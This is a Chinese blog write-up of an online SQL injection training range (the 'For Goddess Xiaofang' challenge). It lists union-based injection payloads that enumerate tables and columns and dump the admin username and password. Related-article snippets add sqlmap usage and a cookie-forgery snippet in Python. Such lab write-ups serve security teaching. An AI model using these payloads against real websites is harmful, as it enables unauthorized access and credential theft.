封神台靶场第一章：为了女神小芳（SQL注入）

最新推荐文章于 2025-05-22 15:08:53 发布

原创最新推荐文章于 2025-05-22 15:08:53 发布 · 2.3k 阅读

10 ·

CC 4.0 BY-SA版权

文章标签：

#安全 #sql #数据库

封神台靶场专栏收录该内容

6 篇文章

订阅专栏

本文通过实例演示了如何利用SQL注入漏洞，逐步从发现注入点到获取敏感信息的过程，并介绍了联合查询的具体应用。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

@封神台网址 https://hack.zkaq.cn

题目

一、寻找注入点

?id=1 and 1=1  #回显正常

?id=1 and 1=2  #回显异常

二、查看字段数

?id=1 order by 1,2  #回显正常

?id=1 order by 3 #回显异常

三、判断回显点

得到回显位置为2 下一步利用联合查询寻找回显点，构造

?id=1 and 1=2 union select 1,2

四、寻找相关内容

1.查看版本信息

?id=1 and 1=2 union select 1,version()

2.爆数据库名

?id=1 and 1=2 union select 1,database()

3.爆表名

?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

4.爆字段名

猜测所要的信息在admin表中(admin一般代表用户）

?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'

5.获取字段值

?id=1 and 1=2 union select 1,group_concat(username,password) from admin

或者用用户admin，接着查询password密码

?id=1 and 1=2 union select 1,password from admin

最后成功拿取flag hellohack

总结

本题考查SQL注入的联合查询(union注入)的用法

了解更多SQL注入点击这里 SQL详解

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

橙子学不会.

关注关注

6
点赞
踩
10

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

封神台靶场（一）为了女神小芳【SQL注入攻击】（超级详细）

xiao_mai_的博客

05-11

1150

这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题，有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能，丰富你的文章UML 图表FLowchart流程图导出与导入导出导入欢迎使用Markdown编辑器你好！这是你第一次使用 Markdown编辑器所展示的欢迎页。如果你想学习如何使用Mar

第一章：为了女神小芳！【配套课时：SQL注入攻击原理实战演练】

weixin_54055099的博客

07-31

554

数值型GET注入漏洞

1 条评论您还未登录，请先登录后发表或查看评论

SQL注入：从原理到实战，新手必防的“数据库漏洞杀手”（原理篇）

最新发布

2302_81945070的博客

05-22

710

SQL（结构化查询语言）是用于操作数据库的核心工具，广泛应用于网站和应用的数据库交互中。SQL注入是一种黑客攻击技术，通过篡改用户输入的数据，将恶意代码注入到SQL语句中，欺骗数据库执行非授权操作。SQL注入的危害极大，可能导致敏感数据泄露、绕过登录验证、文件系统操作、注册表操作甚至远程执行系统命令。SQL注入攻击可根据注入位置（如GET、POST、Head头注入）、结果反馈（有回显注入、无回显注入）和数据类型（字符型注入、数字型注入）进行分类。通过测试语句的执行结果，可以判断是否存在SQL注入漏洞。

封神台——第一题：为了女神小芳

分享简单的安全技术

01-17

763

题目：获取数据库管理员密码题目传送阵渗透步骤第一步：点击“点击查看新闻”超链接，跳转到一个页面，url发生改变，设想这个页面存在sql漏洞。第二步：输入sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch，使用sqlmap对该页面进行扫描，看该页面是否存在漏洞，从结果得知可以从基

封神台靶场-第一章：为了女神小芳！【SQL注入攻击原理】

红凳子的博客

05-07

2526

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档 封神台靶场-第一章：为了女神小芳！【SQL注入攻击原理】前言判断是否存在SQL注入漏洞二、使用步骤1.引入库2.读入数据总结前言提示：通过sql注入拿到管理员密码！尤里正在追女神小芳，在得知小芳开了一家公司后，尤里通过whois查询发现了小芳公司网站，学过一点黑客技术的他，想在女神面前炫炫技。于是他打开了传送门判断是否存在SQL注入漏洞示例：pandas 是基于NumPy 的一种工具，该工具是为了解决数据分析任务而创建的。二

封神台-靶场-第一章：为了女神小芳！（题解）+ 中北网安实训笔记-（20200701）-sql注入基本语法

tonyhapply的博客

07-18

1677

我们先来学习sql注入，

封神台sql注入---第一章节: 为了女神小芳

qq_52573109的博客

09-14

888

1:靶场链接: https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7 2:解题过程: (1):打开传送门，点击"点击查看新闻"发现url出现参数 id = 1,猜测为注入点。（2):判断字段个数: 注入代码： order by 2 ...

封神台 sql 注入靶场 writeup

白帽渗透笔记的博客

07-21

954

今天给大家带来封神台 sql 注入靶场前 4 关的解题思路，并不算难。地址 https://hack.zkaq.cn/battle#bid=cd23d4b58f0dfd3e 0x01 首先判断是否存在注入点，修改地址，尝试 id=1 and 1=1 可以正常显示数据，id=1 and 1=2 无法显示数据，故存在注入。继续猜解字段数，id=1 order by 1 可以正常显示数据，一直到 4 才无法显示，故字段数为 3，使用 id=1 and 1=2 union select 1,

封神台SQL注入-基础靶场1-布尔盲注

原味瓜子、的博客

10-09

1750

注入（一）

tomyyyyy

06-28

330

eg: 例子第一步，判断是否存在sql注入漏洞构造 ?id=1 and 1=1 ，回车页面返回正常构造 ?id=1 and 1=2 ,回车页面不正常，初步判断这里可能存在一个注入漏洞第二步:判断字段数构造 ?id=1 and 1=1 order by 1 回车页面正常构造 ?id=1 and 1=1 order by 2 回车页面正常构造 ?id=1 and 1=1 o...

mbp 封神台靶场一（笔记）

热门推荐

qq_43558415的博客

02-09

1万+

最近在看掌控安全的公开课，里面提到了封神台靶场，因为以前也做过网易云课堂的靶场，便轻车熟路地注册了账号登陆靶场，先看了第一关。第一关是通过SQL注入找到管理员密码，打开链接，点进去一看发现有猫腻。一、寻找注入点看到id=1,便可以用id=1’或id=1 and 1=2来进行测试，以id=1’为例，发现网页出现了错误。二、判断字段数在发现这可以进行SQL注入后便要判断它的字段数，用...

封神台靶场

m0_71518346的博客

10-18

872

尝试，将测试语句放到cookie里面，再发送给服务器，因为网页防护一般只拦截Get、post传参。使用ModHeader插件，SQL语句的空格用加号代替。用from猜测有没有admin表 union select 1,2,3,4,5,6,7,8,9,10 from admin 被拦截。username和password字段的值：admin、b9a2a2b5dffb918c。直接尝试注入判断字段数order by 10。默认管理员后台是根目录的/admin/发现页面回显了2、3、7、8、9。

封神台——尤里的复仇Ⅰ 小芳！

ASD830的博客

03-21

663

我们可以查出“admin“”表里有 “id” “username” “password” 三个字段。题目说让我们拿到管理员账户的密码，我们看一下username和password字段的内容。尤里正在追女神小芳，在得知小芳开了一家公司后，尤里通过whois查询发现了小芳公司网站。根据提示我们需要浅浅的sql注入一下，首先判断一下是否存在SQL注入漏洞。学过一点黑客技术的他，想在女神面前炫炫技。页面不正常，说明存在SQL注入漏洞。页面出现了2，说明我们的回显位为2。页面不正常，判断出字段数为2。

sql注入漏洞测试2（初级篇）--为了女神小芳^o^

waxcj的博客

04-04

3758

今天的的靶场是来自封神台的一个sql注入靶场，图片如下点击进入传送门，结果如下图所示，先观察网站的url，查看是否有sql注入特征的信息，结果发现没有什么有用信息，但是图片下面有一个超链接，点进去看看！进去之后看到了网站的url有我们想要的信息——“？id=1”，这时候我们就可以去试试是否存在sql注入漏洞存在。首先还是使用sqlmap（sqlmap对于新手来说是一款很好用的sql注入软件），进入sqlmap，将要测试网站的url输入进去不测不知道，一测就发现了有两个注入..

封神台在线靶场——第一章:为了女神小芳!

pigzlfa的博客

10-10

743

sql注入基础版。

第一章：为了女神小芳

m0_59205095的博客

05-16

2356

第一章：为了女神小芳通过sql注入拿到管理员密码！尤里正在追女神小芳，在得知小芳开了一家公司后，尤里通过whois查询发现了小芳公司网站学过一点黑客技术的他，想在女神面前炫炫技。于是他打开了宠物猫异国短毛猫纯种猫加菲猫波斯猫辛巴猫舍纯种双色/梵文波斯、异国小猫 CFA注册猫舍 (aqlab.cn) 实验工具 sqlmap 实验环境 kali 1.判断是否存在注入点，页面显示如图所示可能存在sql注入点 http://rhiq8003.ia.aqlab.cn/?id=1and%

封神台靶场---尤里的复仇Ⅰ小芳！---第二章遇到阻难！绕过WAF过滤！

qq_44336568的博客

06-28

3162

封神台----尤里的复仇I-第二章：遇到阻难！绕过WAF过滤！渗透学习、靶场练习

封神台----尤里的复仇I-第一章：为了女神小芳

正在学习的路上...

07-17

3114

1.找注入点 ?id=1 and 1=1 ------ 显示正常 ?id=1 and 1=2 ------ 不显示 2.猜列数、报显示位 ?id=1 order by 2 ------查询了两列 ?id=466454 select 1,2 ------将id设为一个不存在的数...

封神台第一章：为了女神小芳

qq_51459600的博客

12-22

580

实验平台：封神台-掌控安全在线演练靶场 第一章：为了女神小芳! 传送门：http://rhiq8003.ia.aqlab.cn/ 实验目标：获取admin的密码点击查看新闻1，跳转到http://rhiq8003.ia.aqlab.cn/?id=1 发现传递的参数名为id 判断有无注入点 http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 未显示出新闻内容，说明存在注入点判断查询字段数 http://rhiq8003.ia.aqlab.cn/

封神台靶场第三关

03-26

### 封神台靶场第三关解决方案 封神台靶场是一个专门为新手设计的学习平台，其中包含了大量常见的 Web 安全漏洞[^3]。对于第三关的挑战，通常涉及 Cookie 的篡改以及权限提升的技术。 #### 背景分析在这一关中，目标通常是通过修改浏览器中的 Cookie 来获取管理员权限并访问受保护的内容。Cookie 是一种客户端存储机制，在许多情况下用于保存用户的会话状态或身份验证信息。攻击者可以通过伪造这些数据来模拟合法用户的身份[^2]。 #### 技术实现方法以下是解决此问题的具体技术手段： 1. **识别关键字段** 首先观察登录后的请求头部分，找到名为 `ADMINSESSIONIDCSTRCSDQ` 的 Cookie 值。这是一个典型的会话 ID 字符串，可能用来区分不同用户的角色和权限。 2. **替换现有值** 使用开发者工具（如 Chrome DevTools），转到“Application”标签页下的 Storage -> Cookies 中定位站点对应的记录项。将原有的随机字符串更改为已知有效的管理级令牌： ```plaintext LBMLMBCCNPFINOANFGLPCFBC ``` 3. **重新加载页面** 修改完成后刷新当前网页即可触发新的认证流程。如果一切正常，则应该能够跳转至后台管理系统界面。 4. **后续操作** 成功突破后可以进一步探索系统内部结构，了解潜在的安全隐患所在之处。不过需要注意的是，在真实环境中未经授权擅自尝试此类行为属于违法行为，请仅限于授权范围内的练习环境内实践上述技巧[^1]。 ```python import requests from http.cookiejar import MozillaCookieJar # 设置自定义 cookies cookies = {'ADMINSESSIONIDCSTRCSDQ': 'LBMLMBCCNPFINOANFGLPCFBC'} response = requests.get('http://example.com/admin', cookies=cookies) print(response.text) ``` 以上代码片段展示了如何利用 Python 请求库发送带有特定 cookies 参数的 HTTP GET 请求，从而模仿具有特殊权限的访客身份访问受限资源。 #### 总结通过对 Cookie 数据的手动编辑实现了越权访问的功能演示。这一步骤揭示了不当处理用户输入可能导致严重的安全隐患——即使是在看似无害的小型项目里也需格外小心对待安全性议题。